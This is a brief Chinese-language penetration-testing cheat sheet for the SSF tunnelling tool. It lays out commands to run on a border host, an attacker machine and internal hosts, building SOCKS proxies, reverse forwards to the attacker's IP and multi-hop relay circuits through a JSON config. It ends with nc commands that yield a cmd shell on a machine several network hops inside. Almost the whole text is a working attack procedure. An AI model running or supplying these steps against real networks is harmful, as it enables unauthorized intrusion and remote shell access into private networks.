https://github.com/securesocketfunneling/ssf/releases
边界机器执行:
>ssfd.exe -p 1080 linux执行:./ssfd -p 1080

攻击机执行:
>ssf.exe -D 12138 -p 1080 192.168.0.98(边界机器IP)



内网机器执行:
>ssf.exe -F 12138 -p 1080 192.168.0.106(攻击机IP)

多级内网机执行:
>ssfd.exe -p 1080 -c config.json
Json文件加入字段
"circuit": [
{"host": "A中继机IP", "port":"1080"},
{"host": "B中继机IP", "port":"1080"}
],
所有中继机执行:
>ssfd.exe -p 1080 -c config.json
边界机器执行:
>ssf.exe -c config.json -p 1080 多级内网机IP -X 12138
边界机执行:
>nc.exe 127.0.0.1 12138即可获得多级内网机cmdshell
攻击机执行:
>ssfd.exe -p 1080 -c config.json


攻击机执行:
>nc 127.0.0.1 12138
